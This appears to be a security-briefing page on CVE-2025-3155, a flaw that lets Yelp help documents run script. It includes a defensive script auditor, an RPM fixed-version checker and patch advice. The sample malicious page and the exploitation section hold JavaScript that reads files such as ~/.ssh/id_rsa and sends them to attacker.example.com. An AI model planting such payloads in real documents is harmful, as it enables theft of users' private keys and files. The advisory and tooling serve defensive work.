yelp: arbitrary file-read and script execution in Yelp Help Viewer (CVE-2025-3155) #shorts

Summary

Welcome to today’s security briefing. In this episode we’ll cover CVE-2025-3155, a flaw in Yelp, the GNOME Help Viewer. Published on April 3, 2025, this vulnerability allows a specially crafted help document to execute arbitrary script inside the viewer, which can read the user’s files and send them to an attacker. We’ll explain which products are affected, the nature of the flaw, and how you can protect your systems.

Product details

Yelp is the GTK-based help viewer used by the GNOME desktop environment and is shipped by many Linux distributions, including Fedora, Red Hat Enterprise Linux, Ubuntu and others. The packages in question are ‘yelp’ itself and ‘yelp-xsl’, the XSLT stylesheets Yelp uses to turn help sources into the HTML it displays. Fedora 42 has already released updates for both packages, and Red Hat lists fixed builds for RHEL 8 and 9 (see the version table at the end of this page). Users of any GNOME-based Linux distribution running an unpatched version of Yelp should take notice.

Vulnerability type summary

CVE-2025-3155 is classified as ‘Inclusion of Functionality from Untrusted Control Sphere’ (CWE-829). Yelp renders help content in an embedded WebKitGTK web view; the flaw is that script carried inside a help document is passed through to that view and executed, rather than being stripped or restricted, so untrusted content runs code on the user’s machine. This is the same class of problem as script or code injection in web applications, but here the attack vector is a local help document rather than a web page.

Details of the vulnerability

A malicious actor crafts a help file that contains embedded script. When Yelp opens the document, the script runs in the viewer’s rendering process without sandboxing or user consent. Because that process runs as the logged-in user, the script can read files the user can read, such as the contents of the home directory, and transmit them to an external server. There is no prompt or warning; the attack looks like a normal help window. An attacker only needs to get the victim to open the crafted document, for example by offering it as a download or by planting it in a compromised help repository.
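The following audit script is an added example, not code from this page, from Yelp or from yelp-xsl. It looks for the kind of embedded script the paragraph above describes in a help document: it first parses the input as XML (Yelp’s native Mallard .page format uses the namespace http://projectmallard.org/1.0/ and can carry elements from the XHTML namespace), and falls back to a tolerant HTML parser when the input is plain HTML. It flags script elements in any namespace, on* event-handler attributes, and javascript: URIs. The three sample documents, the attacker.example.com host and the file paths in them are constructed for illustration.

```python
"""Audit GNOME help documents (Mallard .page XML or HTML) for embedded script.

Added example for the CVE-2025-3155 write-up; not part of Yelp or yelp-xsl.
"""
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

XHTML_NS = "http://www.w3.org/1999/xhtml"          # namespace of html:script in a .page file
URI_ATTRS = ("href", "src", "action")              # attributes that may carry javascript: URIs


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def _attr_findings(tag: str, attrs) -> list:
    """Findings for one element's attributes: event handlers and javascript: URIs."""
    out = []
    for name, value in attrs:
        lname = _local(name)
        if lname.startswith("on"):
            out.append(f"<{tag}> has event-handler attribute {lname}")
        elif lname in URI_ATTRS and value.strip().lower().startswith("javascript:"):
            out.append(f"<{tag}> has javascript: URI in {lname}")
    return out


def _audit_xml(text: str) -> list:
    root = ET.fromstring(text)                     # raises ET.ParseError for non-XML input
    findings = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "script":                        # html:script, script, or any other namespace
            findings.append(f"<script> element (tag {elem.tag})")
        findings.extend(_attr_findings(tag, elem.attrib.items()))
    return findings


class _HtmlAuditor(HTMLParser):
    """Fallback for HTML files that are not well-formed XML."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script> element")
        self.findings.extend(_attr_findings(tag, [(k, v or "") for k, v in attrs]))


def audit_help_document(text: str) -> list:
    """Return a list of human-readable findings; an empty list means no script content seen."""
    try:
        return _audit_xml(text)
    except ET.ParseError:
        auditor = _HtmlAuditor()
        auditor.feed(text)
        return auditor.findings


# Constructed sample documents (not real help files from any project).
BENIGN_PAGE = """<page xmlns="http://projectmallard.org/1.0/" type="topic" id="index">
  <title>Getting started</title>
  <p>Press <key>F1</key> to open help.</p>
</page>"""

MALICIOUS_PAGE = """<page xmlns="http://projectmallard.org/1.0/"
      xmlns:html="http://www.w3.org/1999/xhtml" type="topic" id="index">
  <title>Getting started</title>
  <p>Press <key>F1</key> to open help.</p>
  <html:script>/* constructed: the read-then-exfiltrate pattern the advisory describes */
    var r = new XMLHttpRequest(); r.open("GET", "file:///etc/hostname", false); r.send();
    new Image().src = "http://attacker.example.com/exfil?d=" + encodeURIComponent(r.responseText);
  </html:script>
</page>"""

MALICIOUS_HTML = """<!DOCTYPE html><html><body>
<h1>Help</h1><a href="javascript:alert(1)">next</a>
<img src="x" onerror="fetch('http://attacker.example.com/exfil')">
</body></html>"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_PAGE), ("page", MALICIOUS_PAGE), ("html", MALICIOUS_HTML)):
        print(name, audit_help_document(doc) or "clean")
```

Point it at every .page and .html file under the help directories you ship or import; any non-empty result is a document Yelp should not be given before the fix is in place, and one that deserves a look even afterwards.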

Conclusion

To protect your environment, update your yelp and yelp-xsl packages to the latest versions released by your distribution. Fedora 42 users should apply the advisories as soon as possible; RHEL 8 and 9 users should confirm they are on the fixed builds listed at the end of this page. Administrators of GNOME-based desktops should also audit any custom or third-party help documents for embedded script and verify their integrity. Although no widespread exploitation has been reported yet, the potential for data exfiltration makes timely patching essential. That’s it for this episode—stay safe and keep your software up to date.

Watch the full video on YouTube: CVE-2025-3155

Remediation and exploitation details

This chain involves the following actors

  • Malicious user: Attacker who crafts and distributes a malicious help document
  • End user: Victim who opens the malicious document in Yelp

The following systems are involved

  • Yelp Help Viewer (Render user help documentation for GNOME applications): Vulnerable application that executes embedded scripts
  • GNOME-based Linux distribution (Operating system environment hosting Yelp): Platform on which Yelp and its dependencies run

Attack entry point

  • Help document loader: Component in Yelp that parses and renders help files, including embedded script elements

Remediation actions

  • System administrator or user, on the Yelp Help Viewer: update yelp and yelp-xsl to the patched versions provided by your distribution
  • System administrator or user, on the GNOME-based Linux distribution: verify that no untrusted help documents are opened in Yelp
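An added example, not Red Hat’s or the page’s own tooling, for the first remediation step on RHEL-family hosts: it compares installed yelp and yelp-xsl package versions against the fixed RPM versions that the CVE record at the end of this page lists, reimplementing rpm’s rpmvercmp ordering so it needs no rpm Python bindings. The CVE record’s entries are marked ‘unaffected’ from the listed version upward, so an installed version equal to or newer than the listed one is fixed. Two things here are assumptions: that the 0:3.28.0-2.el8_10.1 RHEL 8 entry is the yelp-xsl package (the record does not name packages), and the sample inventories, which are constructed input.

```python
"""Compare installed RPM EVRs against the fixed versions for CVE-2025-3155.

Added example; reimplements rpm's rpmvercmp() rather than importing the rpm module.
"""
import re


def rpmvercmp(a: str, b: str) -> int:
    """Return -1, 0 or 1 with rpm's ordering: digit runs compare numerically, letter
    runs lexically, digits beat letters, '~' sorts before anything (pre-release) and
    '^' sorts after a bare version but before anything else (post-release snapshot)."""
    if a == b:
        return 0
    i, j = 0, 0
    while i < len(a) or j < len(b):
        while i < len(a) and not a[i].isalnum() and a[i] not in "~^":   # skip separators
            i += 1
        while j < len(b) and not b[j].isalnum() and b[j] not in "~^":
            j += 1
        ca = a[i] if i < len(a) else ""
        cb = b[j] if j < len(b) else ""
        if ca == "~" or cb == "~":
            if ca != "~":
                return 1
            if cb != "~":
                return -1
            i, j = i + 1, j + 1
            continue
        if ca == "^" or cb == "^":
            if not ca:
                return -1
            if not cb:
                return 1
            if ca != "^":
                return 1
            if cb != "^":
                return -1
            i, j = i + 1, j + 1
            continue
        if not (ca and cb):                      # one side exhausted: longer one wins below
            break
        isnum = ca.isdigit()
        pat = r"\d*" if isnum else r"[A-Za-z]*"
        raw1 = re.match(pat, a[i:]).group(0)
        raw2 = re.match(pat, b[j:]).group(0)
        if not raw2:                             # mixed types: numeric segment is newer
            return 1 if isnum else -1
        seg1, seg2 = raw1, raw2
        if isnum:
            seg1, seg2 = raw1.lstrip("0"), raw2.lstrip("0")
            if len(seg1) != len(seg2):           # more digits means a bigger number
                return 1 if len(seg1) > len(seg2) else -1
        if seg1 != seg2:
            return 1 if seg1 > seg2 else -1
        i, j = i + len(raw1), j + len(raw2)
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1


def parse_evr(evr: str):
    """Split 'epoch:version-release' into (int epoch, version, release); missing epoch is 0."""
    epoch, rest = 0, evr
    if ":" in rest:
        e, rest = rest.split(":", 1)
        epoch = int(e)
    version, sep, release = rest.rpartition("-")
    if not sep:
        version, release = rest, ""
    return epoch, version, release


def evrcmp(a: str, b: str) -> int:
    ea, va, ra = parse_evr(a)
    eb, vb, rb = parse_evr(b)
    if ea != eb:
        return 1 if ea > eb else -1
    return rpmvercmp(va, vb) or rpmvercmp(ra, rb)


# Fixed ("unaffected from") EVRs from the CVE record on this page. The yelp-xsl
# mapping of the 0:3.28.0-2 entry is an assumption; the record lists versions only.
FIXED_EVR = {
    ("rhel8", "yelp"): "2:3.28.1-3.el8_10.1",
    ("rhel8", "yelp-xsl"): "0:3.28.0-2.el8_10.1",
    ("rhel9", "yelp"): "2:40.3-2.el9_6.1",
}


def is_unaffected(installed_evr: str, fixed_evr: str) -> bool:
    return evrcmp(installed_evr, fixed_evr) >= 0


def check_host(product: str, installed: dict) -> dict:
    """installed: {package: EVR}, as printed by
    rpm -q --qf '%{NAME} %{EPOCHNUM}:%{VERSION}-%{RELEASE}\\n' yelp yelp-xsl
    (plain 'rpm -q' omits the epoch, and the epoch decides the comparison here)."""
    result = {}
    for pkg, evr in installed.items():
        fixed = FIXED_EVR.get((product, pkg))
        if fixed is None:
            result[pkg] = "no fixed version on record"
        else:
            result[pkg] = "fixed" if is_unaffected(evr, fixed) else "VULNERABLE"
    return result


# Constructed inventory: a RHEL 8 host that updated yelp-xsl but not yelp.
SAMPLE_RHEL8 = {"yelp": "2:3.28.1-3.el8", "yelp-xsl": "0:3.28.0-2.el8_10.1"}

if __name__ == "__main__":
    print(check_host("rhel8", SAMPLE_RHEL8))
```

The epoch trap is the one that bites in practice: the fixed yelp builds carry epoch 2, and a comparison that drops the epoch (as the default rpm -q output does) would judge 3.28.1-3.el8_10.1 against 2:3.28.1-3.el8_10.1 incorrectly in one direction or the other, so always query with the epoch included.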

Exploitation actions

Arbitrary script injection via HTML in help document

Malicious user, targeting the Yelp Help Viewer: create a help document containing an embedded script tag that reads local files.
Examples:
  • A script that runs inside Yelp’s embedded web view, so it must be browser JavaScript (the original example used Node’s require('fs'), which does not exist in a web view); it reads a local file over file:// and posts it to the attacker’s server:
    <script>
      var xhr = new XMLHttpRequest();
      xhr.open("GET", "file:///home/user/.ssh/id_rsa", false);
      xhr.send();
      new Image().src = "http://attacker.example.com/exfil?data=" + encodeURIComponent(xhr.responseText);
    </script>

Social engineering or supply-chain injection

Malicious user, targeting the GNOME-based Linux distribution: host or distribute the crafted help document via a website, file share or removable media.
Examples:
  • Posting the file on a public help repository or emailing it as an update

User-initiated document load

End user, on the Yelp Help Viewer: open the malicious file in Yelp, believing it to be legitimate documentation. Yelp accepts plain HTML as well as its native Mallard (.page) and DocBook formats, so the file need not look unusual.
Examples:
  • yelp /path/to/malicious-help.html

Script execution within the help rendering process

Embedded script in the document, running in the Yelp Help Viewer: execute file-read operations and send the data to a remote server.
Examples:
  • fetch('http://attacker.example.com/exfil?data=' + encodeURIComponent(fileContents))

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-3155
Description
A flaw was found in Yelp. The Gnome user help application allows the help document to execute arbitrary scripts. This vulnerability allows malicious users to input help documents, which may exfiltrate user files to an external environment.
Provider
redhat
CWE / problem types
Inclusion of Functionality from Untrusted Control Sphere
Affected Software Versions
Each entry is the RPM version from which the product is unaffected (status ‘unaffected’, lessThan ‘*’), i.e. the fixed build and everything newer:
  • Red Hat Enterprise Linux 8: 2:3.28.1-3.el8_10.1 (the yelp line) and 0:3.28.0-2.el8_10.1 (the yelp-xsl line)
  • Red Hat Enterprise Linux 8.2 Advanced Update Support: 2:3.28.1-3.el8_2.1
  • Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support: 2:3.28.1-3.el8_4.1
  • Red Hat Enterprise Linux 8.4 Telecommunications Update Service: 2:3.28.1-3.el8_4.1
  • Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions: 2:3.28.1-3.el8_4.1
  • Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support: 2:3.28.1-3.el8_6.1
  • Red Hat Enterprise Linux 8.6 Telecommunications Update Service: 2:3.28.1-3.el8_6.1
  • Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions: 2:3.28.1-3.el8_6.1
  • Red Hat Enterprise Linux 8.8 Extended Update Support: 2:3.28.1-3.el8_8.1
  • Red Hat Enterprise Linux 9: 2:40.3-2.el9_6.1
  • Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions: 2:40.3-2.el9_0.1
  • Red Hat Enterprise Linux 9.2 Extended Update Support: 2:40.3-2.el9_2.1
  • Red Hat Enterprise Linux 9.4 Extended Update Support: 2:40.3-2.el9_4.1
  • Red Hat Enterprise Linux 6 and 7: no fixed version listed
Date Published
2025-04-03T13:34:18.878Z
Last Updated
2025-05-14T15:51:57.767Z